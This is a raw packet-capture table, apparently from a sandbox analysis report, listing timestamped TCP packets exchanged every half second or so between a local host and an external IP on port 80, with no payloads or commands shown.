                                              Nov 25, 2021 10:53:17.995572090 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:17.995796919 CET5045280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.030004025 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.047055006 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.047108889 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.047451019 CET5045280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.047547102 CET5045280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.081971884 CET8050452176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.420958042 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.454066992 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.454263926 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.455843925 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.489033937 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.489264011 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.522368908 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.537883043 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.537890911 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.538130999 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.538146973 CET5045380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.571294069 CET8050453176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.848479986 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.882369995 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.882615089 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.884130001 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.917953014 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.918242931 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.952141047 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.967533112 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.967583895 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:18.967818975 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:18.967884064 CET5045480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.001892090 CET8050454176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.373292923 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.407381058 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.407660007 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.409172058 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.443141937 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.443325043 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.477344036 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.500919104 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.500961065 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.501113892 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.501166105 CET5045580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.535355091 CET8050455176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.862709999 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.896187067 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.896518946 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.898077965 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.931476116 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.931642056 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.965056896 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.988430977 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.988480091 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:19.988600969 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:19.988636017 CET5045680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.022249937 CET8050456176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.358814955 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.392173052 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.392473936 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.393989086 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.427289009 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.427464962 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.460726976 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.485553980 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.485603094 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.485800982 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.485856056 CET5045880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.519267082 CET8050458176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.872245073 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.906455040 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.906709909 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.908344984 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.942765951 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.942959070 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.976942062 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.999043941 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.999099970 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:20.999385118 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:20.999468088 CET5045980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.033628941 CET8050459176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.352771044 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.386199951 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.386393070 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.387957096 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.421330929 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.421602964 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.454977989 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.490827084 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.490875006 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.491137028 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.491173029 CET5046080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.524569988 CET8050460176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.858695030 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.892807007 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.892977953 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.894494057 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.928455114 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.928659916 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.962687969 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.984409094 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.984461069 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:21.984668016 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:21.984720945 CET5046180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.018953085 CET8050461176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.373152971 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.407234907 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.407454014 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.409034967 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.443053007 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.443284988 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.477385044 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.498653889 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.498703003 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.498863935 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.498975992 CET5046280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.533042908 CET8050462176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.894097090 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.927503109 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.927753925 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.929209948 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.962527990 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:22.962769985 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:22.996321917 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.012940884 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.013039112 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.013242960 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.013319969 CET5046380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.046744108 CET8050463176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.393338919 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.427369118 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.427532911 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.429111958 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.462968111 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.463131905 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.497023106 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.516483068 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.516506910 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.516700029 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.516746044 CET5046480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.550715923 CET8050464176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.832775116 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.866138935 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.866461992 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.867976904 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.901451111 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.901633978 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.934997082 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.950930119 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.950983047 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:23.951201916 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.951253891 CET5046580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:23.984539986 CET8050465176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.341289997 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.374874115 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.375032902 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.376610041 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.410021067 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.410288095 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.443794012 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.459855080 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.459954023 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.460192919 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.460247040 CET5046680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.494363070 CET8050466176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.811712980 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.845762014 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.845978022 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.847520113 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.881468058 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.881690025 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.915779114 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.931727886 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.931782007 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:24.932133913 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.932216883 CET5046780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:24.966403961 CET8050467176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.318824053 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.353022099 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.353426933 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.354969025 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.388824940 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.389082909 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.422517061 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.439336061 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.439384937 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.439533949 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.439584017 CET5046880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.473112106 CET8050468176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.847018957 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.881124973 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.881344080 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.882853985 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.916794062 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.917002916 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.951040030 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.969530106 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.969584942 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:25.969866991 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:25.969950914 CET5046980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.004157066 CET8050469176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.349343061 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.383462906 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.383707047 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.385596037 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.419625044 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.419796944 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.453809023 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.469978094 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.470042944 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.470276117 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.470333099 CET5047080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.504352093 CET8050470176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.851162910 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.884669065 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.884982109 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.886543989 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.919944048 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.920208931 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.953588009 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.969342947 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.969393015 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:26.969527960 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:26.969578028 CET5047180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.002978086 CET8050471176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.315928936 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.349044085 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.349303007 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.350877047 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.384042025 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.384341002 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.417753935 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.433881998 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.433944941 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.434173107 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.434225082 CET5047280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.467401981 CET8050472176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.810986996 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.844926119 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.845155954 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.846662998 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.880573988 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.880913019 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.914958000 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.932095051 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.932120085 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:27.932414055 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.932445049 CET5047380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:27.966542959 CET8050473176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.320195913 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.353641987 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.353822947 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.355335951 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.388807058 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.388993979 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.422595024 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.439199924 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.439265013 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.439551115 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.439646959 CET5047480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.473104000 CET8050474176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.827157021 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.860512018 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.860806942 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.862322092 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.895827055 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.896070957 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.929668903 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.948648930 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.948714018 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:28.949028969 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.949127913 CET5047580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:28.982861996 CET8050475176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.337023973 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.371121883 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.371277094 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.372843027 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.406891108 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.407104015 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.441117048 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.457895041 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.457951069 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.458100080 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.458156109 CET5047680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.492371082 CET8050476176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.808195114 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.841382027 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.841578007 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.843203068 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.876363039 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.876607895 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.909775019 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.926882029 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.926945925 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:29.927454948 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.927515030 CET5047780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:29.960942984 CET8050477176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.273957014 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.307113886 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.307301998 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.308855057 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.341993093 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.342288971 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.375729084 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.405215025 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.405278921 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.405596972 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.405694008 CET5047880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.439310074 CET8050478176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.751566887 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.785007000 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.785285950 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.786736012 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.820252895 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.820492029 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.853914976 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.869714975 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.869757891 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:30.869899035 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.869952917 CET5047980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:30.903556108 CET8050479176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.261049032 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.295120955 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.295389891 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.296933889 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.330858946 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.331038952 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.365087032 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.403213978 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.403283119 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.403429985 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.403489113 CET5048080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.437550068 CET8050480176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.772998095 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.806444883 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.806642056 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.808199883 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.841537952 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.841713905 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.875260115 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.902401924 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.902466059 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:31.902616024 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.902678013 CET5048180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:31.936275959 CET8050481176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:32.295938015 CET5048280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:32.330105066 CET8050482176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:53:32.330351114 CET5048280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:53:32.331859112 CET5048280192.168.11.20176.223.209.128
